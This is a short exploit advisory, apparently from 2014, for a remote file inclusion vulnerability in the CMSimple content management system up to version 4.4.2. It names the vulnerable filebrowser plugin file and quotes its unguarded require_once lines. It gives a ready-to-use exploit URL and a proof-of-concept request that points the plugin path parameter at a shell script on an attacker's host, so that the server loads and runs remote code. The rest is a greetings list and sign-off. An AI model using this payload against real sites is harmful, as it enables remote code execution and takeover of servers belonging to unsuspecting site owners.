============================================================================================================= [o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability Software : CMSimple - Open Source CMS with no database Version : 4.4, 4.4.2 and below Vendor : http://www.cmsimple.org Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database. All data are stored in a simple file system. ============================================================================================================= [o] Vulnerable File plugins/filebrowser/classes/required_classes.php require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php'; require_once $pth['folder']['plugin'] . 'classes/filebrowser.php'; ============================================================================================================= [o] Exploit http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI] ============================================================================================================= [o] PoC http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt? ============================================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{ ============================================================================================================= [o] April 17 2014 - Papua, Indonesia - Met Paskah! Tuhan berkati.. :)